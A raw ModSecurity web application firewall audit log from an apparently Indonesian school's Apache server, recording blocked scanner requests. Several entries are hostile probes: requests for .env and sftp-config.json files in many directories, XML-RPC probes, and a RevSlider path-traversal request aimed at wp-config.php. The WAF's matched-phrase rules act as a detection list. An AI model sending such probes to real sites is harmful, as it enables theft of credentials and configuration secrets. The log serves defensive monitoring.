"%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745767946786084 2574 (- - -) Stopwatch2: 1745767946786084 2574; combined=1388, p1=425, p2=928, p3=0, p4=0, p5=34, sr=75, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --875c2926-Z-- --695db701-A-- [27/Apr/2025:22:32:29 +0700] aA5ODSKLpK55oNIcEw1tlAAAAEc 103.236.140.4 50628 103.236.140.4 8181 --695db701-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.74.185 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.74.185 X-Forwarded-Proto: http Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --695db701-C-- demo.sayHello --695db701-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --695db701-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745767949125718 6182 (- - -) Stopwatch2: 1745767949125718 6182; combined=4584, p1=634, p2=3698, p3=31, p4=38, p5=106, sr=139, sw=77, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --695db701-Z-- --c7b5c77c-A-- [27/Apr/2025:22:32:45 +0700] aA5OHf7FMV4FIoAOnu4zBwAAAA4 103.236.140.4 50696 103.236.140.4 8181 --c7b5c77c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.74.185 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.74.185 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --c7b5c77c-C-- demo.sayHello --c7b5c77c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --c7b5c77c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745767965882704 6474 (- - -) Stopwatch2: 1745767965882704 6474; combined=4843, p1=671, p2=3890, p3=37, p4=40, p5=118, sr=117, sw=87, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c7b5c77c-Z-- --9d7a3374-A-- [27/Apr/2025:22:48:26 +0700] aA5RyiKLpK55oNIcEw1xjAAAAFg 103.236.140.4 38142 103.236.140.4 8181 --9d7a3374-B-- GET /sftp-config.json HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 13.38.23.15 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 13.38.23.15 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 Accept: */* --9d7a3374-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9d7a3374-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745768906691250 1016 (- - -) Stopwatch2: 1745768906691250 1016; combined=318, p1=277, p2=0, p3=0, p4=0, p5=41, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9d7a3374-Z-- --4af9665d-A-- [27/Apr/2025:23:47:22 +0700] aA5fmv7FMV4FIoAOnu49VgAAAAo 103.236.140.4 56690 103.236.140.4 8181 --4af9665d-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 198.211.110.161 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 198.211.110.161 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --4af9665d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4af9665d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745772442938515 714 (- - -) Stopwatch2: 1745772442938515 714; combined=295, p1=259, p2=0, p3=0, p4=0, p5=36, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4af9665d-Z-- --717ff17c-A-- [28/Apr/2025:02:11:48 +0700] aA6BdCKLpK55oNIcEw1-UgAAAEo 103.236.140.4 38858 103.236.140.4 8181 --717ff17c-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.80.2 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.80.2 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (SMART-TV; X11; Linux armv7l) AppleWebkit/537.42 (KHTML, like Gecko) Chromium/25.0.1349.2 Chrome/25.0.1349.2 Safari/537.42 Accept-Charset: utf-8 --717ff17c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --717ff17c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745781108132392 926 (- - -) Stopwatch2: 1745781108132392 926; combined=370, p1=316, p2=0, p3=0, p4=0, p5=54, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --717ff17c-Z-- --ce28326a-A-- [28/Apr/2025:03:56:22 +0700] aA6Z9mj1i6BJZll4jGOnewAAAIc 103.236.140.4 40514 103.236.140.4 8181 --ce28326a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 138.197.196.84 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 138.197.196.84 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --ce28326a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ce28326a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745787382245446 1090 (- - -) Stopwatch2: 1745787382245446 1090; combined=507, p1=468, p2=0, p3=0, p4=0, p5=39, sr=122, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ce28326a-Z-- --b4f8bf12-A-- [28/Apr/2025:06:00:54 +0700] aA63Jmj1i6BJZll4jGOt1wAAAIc 103.236.140.4 41178 103.236.140.4 8181 --b4f8bf12-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 194.163.159.240 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 194.163.159.240 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; NetBSD) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36 Accept-Charset: utf-8 --b4f8bf12-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b4f8bf12-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745794854965512 748 (- - -) Stopwatch2: 1745794854965512 748; combined=316, p1=284, p2=0, p3=0, p4=0, p5=32, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b4f8bf12-Z-- --f1ca5a28-A-- [28/Apr/2025:07:33:47 +0700] aA7M64_5LpLtj_OTfS_UqgAAAM4 103.236.140.4 34426 103.236.140.4 8181 --f1ca5a28-B-- GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 93.123.109.196 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 93.123.109.196 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --f1ca5a28-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f1ca5a28-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745800427536361 1034 (- - -) Stopwatch2: 1745800427536361 1034; combined=389, p1=350, p2=0, p3=0, p4=0, p5=38, sr=114, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f1ca5a28-Z-- --47255d5b-A-- [28/Apr/2025:07:33:48 +0700] aA7M7FT4soy9XydcuKajggAAAFI 103.236.140.4 34428 103.236.140.4 8181 --47255d5b-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 93.123.109.196 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 93.123.109.196 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --47255d5b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --47255d5b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745800428242237 959 (- - -) Stopwatch2: 1745800428242237 959; combined=371, p1=332, p2=0, p3=0, p4=0, p5=39, sr=119, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --47255d5b-Z-- --a84b0771-A-- [28/Apr/2025:07:33:48 +0700] aA7M7I_5LpLtj_OTfS_UrAAAANY 103.236.140.4 34434 103.236.140.4 8181 --a84b0771-B-- GET /api/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 93.123.109.196 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 93.123.109.196 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --a84b0771-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a84b0771-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745800428698742 759 (- - -) Stopwatch2: 1745800428698742 759; combined=340, p1=297, p2=0, p3=0, p4=0, p5=43, sr=98, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a84b0771-Z-- --8cb03a3f-A-- [28/Apr/2025:07:33:49 +0700] aA7M7VT4soy9XydcuKajgwAAAFE 103.236.140.4 34436 103.236.140.4 8181 --8cb03a3f-B-- GET /laravel/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 93.123.109.196 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 93.123.109.196 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --8cb03a3f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8cb03a3f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745800429043082 766 (- - -) Stopwatch2: 1745800429043082 766; combined=332, p1=298, p2=0, p3=0, p4=0, p5=34, sr=137, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8cb03a3f-Z-- --c297c15c-A-- [28/Apr/2025:07:33:49 +0700] aA7M7VT4soy9XydcuKajhAAAAFA 103.236.140.4 34438 103.236.140.4 8181 --c297c15c-B-- GET /test/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 93.123.109.196 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 93.123.109.196 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --c297c15c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c297c15c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745800429391431 665 (- - -) Stopwatch2: 1745800429391431 665; combined=254, p1=223, p2=0, p3=0, p4=0, p5=31, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c297c15c-Z-- --487c4347-A-- [28/Apr/2025:07:33:50 +0700] aA7M7lT4soy9XydcuKajhQAAAFQ 103.236.140.4 34444 103.236.140.4 8181 --487c4347-B-- GET /admin/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 93.123.109.196 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 93.123.109.196 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --487c4347-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --487c4347-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745800430173044 807 (- - -) Stopwatch2: 1745800430173044 807; combined=314, p1=278, p2=0, p3=0, p4=0, p5=36, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --487c4347-Z-- --12e11c66-A-- [28/Apr/2025:07:33:50 +0700] aA7M7lT4soy9XydcuKajhgAAAFY 103.236.140.4 34450 103.236.140.4 8181 --12e11c66-B-- GET /vendor/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 93.123.109.196 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 93.123.109.196 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --12e11c66-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --12e11c66-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745800430625648 790 (- - -) Stopwatch2: 1745800430625648 790; combined=288, p1=239, p2=0, p3=0, p4=0, p5=49, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --12e11c66-Z-- --5e13b578-A-- [28/Apr/2025:07:33:51 +0700] aA7M74_5LpLtj_OTfS_UrwAAAME 103.236.140.4 34452 103.236.140.4 8181 --5e13b578-B-- GET /sites/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 93.123.109.196 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 93.123.109.196 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --5e13b578-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5e13b578-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745800431377582 821 (- - -) Stopwatch2: 1745800431377582 821; combined=311, p1=275, p2=0, p3=0, p4=0, p5=36, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5e13b578-Z-- --7bbf3e03-A-- [28/Apr/2025:07:33:51 +0700] aA7M78JruAEpaSEZ7DC71gAAAAc 103.236.140.4 34458 103.236.140.4 8181 --7bbf3e03-B-- GET /blog/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 93.123.109.196 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 93.123.109.196 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --7bbf3e03-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7bbf3e03-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745800431723300 832 (- - -) Stopwatch2: 1745800431723300 832; combined=317, p1=281, p2=0, p3=0, p4=0, p5=35, sr=84, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7bbf3e03-Z-- --1e0a217a-A-- [28/Apr/2025:07:33:52 +0700] aA7M8MJruAEpaSEZ7DC71wAAAAY 103.236.140.4 34460 103.236.140.4 8181 --1e0a217a-B-- GET /system/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 93.123.109.196 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 93.123.109.196 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --1e0a217a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1e0a217a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745800432069700 737 (- - -) Stopwatch2: 1745800432069700 737; combined=302, p1=271, p2=0, p3=0, p4=0, p5=31, sr=114, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1e0a217a-Z-- --9469217c-A-- [28/Apr/2025:07:33:52 +0700] aA7M8I_5LpLtj_OTfS_UsAAAAMA 103.236.140.4 34462 103.236.140.4 8181 --9469217c-B-- GET /public/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 93.123.109.196 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: 